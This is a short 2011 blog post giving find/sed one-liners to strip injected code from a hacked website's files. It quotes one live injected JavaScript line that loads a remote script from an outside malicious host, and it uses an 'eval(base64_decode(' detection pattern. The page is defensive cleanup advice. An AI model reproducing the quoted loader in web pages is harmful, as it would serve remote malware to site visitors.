Skip to content

How to easy clean infected sites

by admin on April 13th, 2011

When you experience code injection in your site and there is only appending of code to the end of your site files you can clean it with :

cd to your site’s httpdocs and run:

find .  -type f -exec sed -i ‘/oployau.fancountblogger.com/d’ {} \;

for lines like :

js/ac_runactivecontent.js:document.write(‘<s’+’cript type=”text/javascript” src=”http://oployau.fancountblogger.com:8080/Link.js”></scr’+’ipt>’);

or just

find . -name “*.php” -type f -exec sed -i ‘/eval(base64_decode(/d’ {} \;

if you want to check/repair only php files with base64 encoded injection.

Of course you need shell access for this or you can just request you hosting guys to do it for you.

 

No comments yet

Leave a Reply

Note: XHTML is allowed. Your email address will never be published.

Subscribe to this comment feed via RSS